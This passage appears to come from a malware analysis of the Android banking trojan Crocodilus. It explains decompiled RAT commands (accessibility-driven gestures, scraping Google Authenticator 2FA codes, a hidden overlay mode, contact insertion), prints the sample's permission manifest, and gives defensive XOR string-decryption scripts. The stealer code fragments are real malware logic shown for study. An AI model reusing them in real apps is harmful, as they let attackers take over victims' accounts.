When a TYPE_WINDOW_STATE_CHANGED event is triggered, this code compares the various crypto targets with the currently active one specified by the C2 server:
"Four samples includes a custom-written native library that loads a file from the assets folder. This file is hidden with a _.png_extension but is in fact encrypted data."
This quote comes from the Zimperium article mentioned in the introduction. However, although a significant number of files are present in the assets folder, nothing in the code lets us confirm this assertion for this particular sample.
Interesting RAT commands
In their blog post, ThreatFabric published the list of RAT commands but did not write a technical review of them. We chose to focus on three promising commands.
Complex Gesture - trXSB123QEBASDF
According to ThreatFabric, this command lets the malware perform a complex finger gesture on the device. The behaviour depends on the C2 order, and more precisely on the number of coordinates it carries.
```java
// retrieve the coordinates saved inside the JSON object
JSONArray jSONArray = jSONObject.getJSONArray(this.new_list_commands.str_coordinates);
int duration = jSONObject.getInt(this.new_list_commands.str_duration);
ArrayList arrayList = new ArrayList();
for (int indexObj = 0; indexObj < jSONArray.length(); indexObj++) {
    // create a Point for each (x, y) coordinate pair in the C2 order
    JSONObject coordinatesObj = jSONArray.getJSONObject(indexObj);
    arrayList.add(new PointF((float) coordinatesObj.getDouble(this.new_list_commands.str_x),
                             (float) coordinatesObj.getDouble(this.new_list_commands.str_y)));
}
complexGesture(arrayList, (long) duration);
return;
```
If listCoordinatesXY holds two or more PointF objects (with distinct coordinates), the dispatcher simulates finger movement through the given points. Otherwise a circle is added to simulate a simple tap by the user.
This technique relies on the AccessibilityService API. dispatchGesture() is a legitimate method introduced in Android 7.0 (API level 24) that lets apps with accessibility privileges simulate complex user gestures without any user interaction. Here the malware receives a set of coordinates from the C2 server, builds a gesture path from these points and executes the gesture on the device. For dispatchGesture() to succeed, the accessibility service configuration must declare android:canPerformGestures="true", which is worth checking in the service's XML resource when triaging a sample.
Steal Google Authenticator codes - TG32XAZADG
According to ThreatFabric, the malware steals 2FA codes from Google Authenticator and hides them in SharedPreferences. When the RAT command ID TG32XAZADG is received, the app "com.google.android.apps.authenticator2" is launched via an intent. Several boolean fields are then set that affect the program's behaviour later on.
```java
/* RAT CODE */
private void stealGoogleAuthApp() {
    Intent launchIntentForPackage = getPackageManager().getLaunchIntentForPackage(this.new_list_commands.str_package_GoogleAuthenticator);
    if (launchIntentForPackage != null && this.mainClass.isLockScreenShowing(this)) {
        startActivity(launchIntentForPackage); // start Google Authenticator
        new Handler(Looper.getMainLooper()).postDelayed(new Runnable() { // from class: nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF.8
            @Override // java.lang.Runnable
            public void run() {
                RAT_commands.this.value_setTrueWhenGAuth = true;
                RAT_commands.this.valueSetFalse = false;
            }
        }, 1800);
    }
}
```
Despite its name, isLockScreenShowing() performs a verification step that checks whether the device is on the lock screen:
- Returns true if the device is not on the lock screen.
- Returns false if the device is on the lock screen.
The steal_2FACode function uses the AccessibilityNodeInfo object to inspect the text currently displayed in the window and retrieves 2FA codes by matching the regular expression \d{6,8}, which captures every numeric sequence between 6 and 8 digits long. The matched codes are appended to an ArrayList. If the current node has no text, the function visits its child nodes and calls itself recursively.
Each code is then placed in a JSONObject, converted to a string and written to the SharedPreferences file "FilesSettings" under the key "L74F7L400TR".
According to ThreatFabric, this RAT command extracts a lot of information about the current window. In addition, a black rectangle is drawn in front of the view to hide the RAT's activity. In the dispatcher code, hidden_bool is set to true and GLOBAL_ACTION_HOME is performed.
The hidden_bool value is consumed inside onAccessibilityEvent(). For that function to be triggered, an AccessibilityEvent (such as TYPE_WINDOW_STATE_CHANGED or TYPE_VIEW_CLICKED) must first occur, which is exactly what the preceding performGlobalAction(2) call (GLOBAL_ACTION_HOME) provokes.
core_hidden_mode starts a new thread and uses the hideExtract function to collect information about the current view (isChecked, isClickable, getPackageName, ...) and to create a new rectangle sized to the screen.
In hideExtract(), the rectangle is created with android.graphics.Rect. A large amount of information is then put into a JSONObject that is sent to the C2.
In June, ThreatFabric discovered a new version of Crocodilus with a feature update: the malware can now "modify the contact list" and "adds a specified contact to the victim's contact list".
The goal is to lure the victim into communicating with a seemingly legitimate contact and to extract sensitive information through social engineering. For this behaviour the C2 sends a response with the command ID TRU9MMRHBCRO and two strings, a name and a phone number; the manifest already requests android.permission.WRITE_CONTACTS, which adding a contact requires.
```xml
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="35" android:compileSdkVersionCodename="15" package="nuttiness.pamperer.cosmetics" platformBuildVersionCode="35" platformBuildVersionName="15">
    <uses-sdk android:minSdkVersion="26" android:targetSdkVersion="35"/>
    <uses-feature android:name="android.hardware.telephony" android:required="false"/>
    <uses-feature android:name="android.hardware.camera" android:required="false"/>
    <uses-feature android:name="android.software.leanback" android:required="false"/>
    <uses-feature android:name="android.hardware.touchscreen" android:required="false"/>
    <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH"/>
    <uses-permission android:name="android.permission.READ_CELL_BROADCASTS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_DATA_SYNC"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SCHEDULE_EXACT_ALARM"/>
    <uses-permission android:name="android.permission.BROADCAST_SMS"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"/>
    <uses-permission android:name="android.permission.USE_EXACT_ALARM"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_CAMERA"/>
    <application android:theme="type1/16973840" android:label="IKO" android:icon="type1/2131361792" android:name="aixx.uvoe.pxoq.Iqom" android:allowBackup="true" android:supportsRtl="true" android:extractNativeLibs="false" android:usesCleartextTraffic="true" android:roundIcon="type1/2131361793">
        <meta-data android:name="com.december.META_6391" android:value="true"/>
        <activity android:theme="type1/16973909" android:name="nuttiness.pamperer.cosmetics.uFAWABASFEFwvh" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LEANBACK_LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.rdmKJuIymoGRaV"/>
        <service android:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.rtdzNIjokJIwY" android:exported="false" android:foregroundServiceType="0x40"/>
        <activity android:theme="type1/16973909" android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.LySOcIBihIQ"/>
        <activity android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.meBMKbzEKRHH"/>
        <activity android:icon="type1/2131361792" android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.MRlmQjhjzwF"/>
        <activity android:icon="type1/2131361792" android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.qcdtubatsJj"/>
        <activity android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.FuZhBIEyzw"/>
        <service android:name="nuttiness.pamperer.cosmetics.dXvjqtFLitYbw" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </service>
        <receiver android:name="nuttiness.pamperer.cosmetics.qrNsfPHktbXX.JvwhVMVjSgK" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.SCREEN_OFF"/>
                <action android:name="android.intent.action.SCREEN_ON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.ACTION_PACKAGE_RESTARTED"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.intent.action.CONNECTIVITY_CHANGE"/>
                <action android:name="android.intent.action.ROLE_HOLDER_CHANGED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.MY_PACKAGE_REPLACED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.casket.liftingActivity" android:exported="false"/>
        <activity android:name="com.unknowing.thermosActivity" android:exported="false"/>
        <receiver android:label="IKO" android:name="nuttiness.pamperer.cosmetics.NJWLtIfaF.nTsZKYXKEBeFL" android:permission="android.permission.BIND_DEVICE_ADMIN" android:exported="true">
            <meta-data android:name="android.app.device_admin" android:resource="type1/2131623937"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED"/>
                <action android:name="android.app.action.ACTION_PASSWORD_FAILED"/>
                <action android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED"/>
            </intent-filter>
        </receiver>
        <service android:label="IKO" android:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:exported="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="type1/2131623936"/>
        </service>
        <activity android:theme="type1/16973840" android:label="IKO" android:name="nuttiness.pamperer.cosmetics.NJWLtIfaF.qZNjmvvzOlM"/>
        <service android:name="nuttiness.pamperer.cosmetics.qrNsfPHktbXX.ARpBKilrFVPX" android:exported="false"/>
        <service android:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.XsjZacRzUT" android:exported="false"/>
        <service android:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.kiTSsznoH" android:enabled="true" android:exported="false" android:foregroundServiceType="0x1"/>
        <activity android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.oNVySSUEROdsit" android:exported="true" android:launchMode="3"/>
        <activity android:label="" android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.VjdYBSczMgQj" android:excludeFromRecents="true" android:launchMode="2"/>
        <receiver android:name="nuttiness.pamperer.cosmetics.XFCcaJxgsv.GqDpxLfoTDmtcd" android:permission="android.permission.BROADCAST_WAP_PUSH" android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:label="Chrome" android:name="nuttiness.pamperer.cosmetics.NAoCWwqxpyor" android:exported="true"/>
        <activity-alias android:label="Chrome" android:icon="type1/2131099736" android:name="nuttiness.pamperer.cosmetics.TrumpTayyip" android:enabled="false" android:exported="true" android:targetActivity="nuttiness.pamperer.cosmetics.NAoCWwqxpyor">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </acti
```
vity-alias><serviceandroid:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.AkMYyDUgEerrDn"android:exported="false"android:foregroundServiceType="0x20"/><serviceandroid:name="com.scariness.wrongedService"android:exported="false"/><receiverandroid:name="com.skewer.stormReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver><meta-dataandroid:name="com.numerator.META_5259"android:value="true"/><receiverandroid:name="com.chevy.ruleReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.BATTERY_LOW"/></intent-filter></receiver><meta-dataandroid:name="com.quartered.META_1343"android:value="true"/><receiverandroid:name="com.siberian.passportReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.MEDIA_MOUNTED"/></intent-filter></receiver><activityandroid:name="com.apple.treeActivity"android:exported="false"/><receiverandroid:name="com.chili.impulseReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.MEDIA_MOUNTED"/></intent-filter></receiver><serviceandroid:name="com.humorist.safenessService"android:exported="false"/><serviceandroid:name="com.flap.decayService"android:exported="false"/><activityandroid:name="com.relight.joltActivity"android:exported="false"/><meta-dataandroid:name="com.uncoated.META_1114"android:value="true"/></application></manifest>
Strings decryption script
```python
import pyjadx
import re

jadx = pyjadx.Jadx()
app = jadx.load("classes.dex")  # Stage one of crocodilus

for cls in app.classes:
    code = cls.code
    if not code:
        continue
    lines = code.splitlines()
    print("\r")
    for i, line in enumerate(lines):
        # Look for a Java byte-array initializer such as {94, 112, Byte.MAX_VALUE, 113}
        if re.search(r"\{\s*(?:\d+|Byte\.MAX_VALUE)(?:\s*,\s*(?:\d+|Byte\.MAX_VALUE))*\s*\}", line):
            matches = re.findall(r'\b(Byte\.MAX_VALUE|\d+)\b', line)
            if not matches:
                continue
            try:
                # jadx prints 127 as Byte.MAX_VALUE; every byte is XORed with the key 21
                decoded = ''.join(chr((127 if val == "Byte.MAX_VALUE" else int(val)) ^ 21) for val in matches)
                print(f"In class -> {cls.name}")
                print("From: ", line.strip())
                print("Decrypted strings: ", decoded)
                print("-" * 40)
            except Exception as e:
                print(f"Error in decryption routine inside -> {cls.name}: {e}")
```
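The same XOR-21 scheme, as an added example that is not the article's script: it works offline on jadx-exported Java source text instead of a live pyjadx session, handles negative (signed) byte literals as well as the `Byte.MAX_VALUE` token, and goes slightly beyond the page by providing the forward direction so a constructed sample line can be built and checked; the XOR key of 21 is the one the article identifies, and the sample line below is constructed, not taken from the sample.

```python
import re
from pathlib import Path
from typing import Iterator

XOR_KEY = 21  # single-byte XOR key used by this Crocodilus stage-one sample

# A Java byte-array initializer as jadx prints it, e.g. {Byte.MAX_VALUE, 116, 113, 109}
ARRAY_RE = re.compile(
    r"\{\s*(?:-?\d+|Byte\.(?:MAX|MIN)_VALUE)"
    r"(?:\s*,\s*(?:-?\d+|Byte\.(?:MAX|MIN)_VALUE))*\s*\}"
)

def _token_value(tok: str) -> int:
    """Map one initializer token to an unsigned byte (jadx prints 127 as Byte.MAX_VALUE)."""
    if tok == "Byte.MAX_VALUE":
        return 127
    if tok == "Byte.MIN_VALUE":
        return 128
    return int(tok) & 0xFF  # Java bytes are signed; normalise negatives to 0..255

def decode_array(literal: str, key: int = XOR_KEY) -> str:
    """Decode one {...} literal by XORing every byte with the key."""
    inner = literal.strip()[1:-1]
    return "".join(chr(_token_value(t.strip()) ^ key) for t in inner.split(",") if t.strip())

def decode_line(line: str, key: int = XOR_KEY) -> list[str]:
    """Decode every byte-array literal found on one decompiled line."""
    return [decode_array(m.group(0), key) for m in ARRAY_RE.finditer(line)]

def encode_array(plain: str, key: int = XOR_KEY) -> str:
    """Inverse of decode_array, used here only to build a constructed test line."""
    toks = ["Byte.MAX_VALUE" if (ord(c) ^ key) == 127 else str(ord(c) ^ key) for c in plain]
    return "{" + ", ".join(toks) + "}"

def scan_sources(root: str, key: int = XOR_KEY) -> Iterator[tuple[str, int, str]]:
    """Walk a jadx output directory and yield (file, line number, decoded string)."""
    for path in Path(root).rglob("*.java"):
        for no, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            for s in decode_line(line, key):
                yield (str(path), no, s)

# Constructed sample line (not from the sample), shaped like jadx output;
# the 'j' in "jadx" XORs to 127, so it is printed as Byte.MAX_VALUE.
SAMPLE_LINE = "String a = b(new byte[]" + encode_array("jadx") + ");"

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(decode_line(SAMPLE_LINE))  # ['jadx']
```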